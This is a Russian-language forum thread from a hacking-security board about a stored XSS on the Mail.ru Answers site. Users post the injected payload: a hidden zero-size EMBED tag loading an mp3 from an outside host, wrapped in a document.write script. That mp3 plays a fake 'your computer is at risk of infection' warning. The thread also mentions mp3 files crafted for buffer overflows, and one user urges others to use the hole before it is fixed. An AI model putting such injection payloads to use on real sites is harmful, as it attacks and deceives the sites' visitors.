Форум АНТИЧАТ - Ответы мэил.ру )

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Безопасность (https://forum.antichat.xyz/forumdisplay.php?f=41)

- - Ответы мэил.ру ) (https://forum.antichat.xyz/showthread.php?t=153358)

Ответы мэил.ру )

Код:

_http://otvet.mail.ru/question/31501710/

Что за прикол ?)

Цитата:

Что за прикол ?)

этот прикол называеться xss, зри в сурс там хтмкой воспроизводиться мп3

Код:

<EMBED TYPE="application/x-mplayer2" SRC="http://upload.maka.in///files/1/2/super_virus.mp3" WIDTH=0 HEIGHT=0> </embed>

Код:

&lt;script&gt;document.write(unescape('<EMBED TYPE="application/x-mplayer2" SRC="http://upload.maka.in///files/1/2/super_virus.mp3" WIDTH=0 HEIGHT=0> </embed>'));&lt;/script&gt;

Единственное неполностью код написал- думаю что завтра этот баг пофиксят, ну а для любопытных полная XSSка на ответахмайлру в (данном посте) выглядит таким образом

Дык я догнал что XSS вот ток не нашёл где,а ща нашёл )

Интересно,что за вирусня такая...

Цитата:

Сообщение от GenTao

Дык я догнал что XSS вот ток не нашёл где,а ща нашёл )

Интересно,что за вирусня такая...

Ты сам себе противоречиш XSS и вирус это две разные вещи, могу успокоить всех в том числе и гостей (которых было 14) что это была глупая шутка и вашим машинам ничего неугрожает (просто воспроизводился файл мп3 при заходе на страницу)

P.S. Для тех кто подошол позже и незнает о чем шла речь(этот топик на майлру был удален)- обьясняю что при заходе на страницу воспроизводился мп3 файл и сквозь сирену- был голос "Ваш компьютер подвержен риску заражения"(или что то в этом роде)

Ну,это понятно,просто через мп3 какие-то трюки выделывались раньше... )

не трюки, а в mp3-шку можно встроить специально сформированный код, который может привести к переполнению буффера и выполнению произвольного кода на системе жертвы

Это за гранью...касательно последнего )Зачем тогда xss вообще - повесил на сайт мп3 и всё)

Юзай xss пока не убрали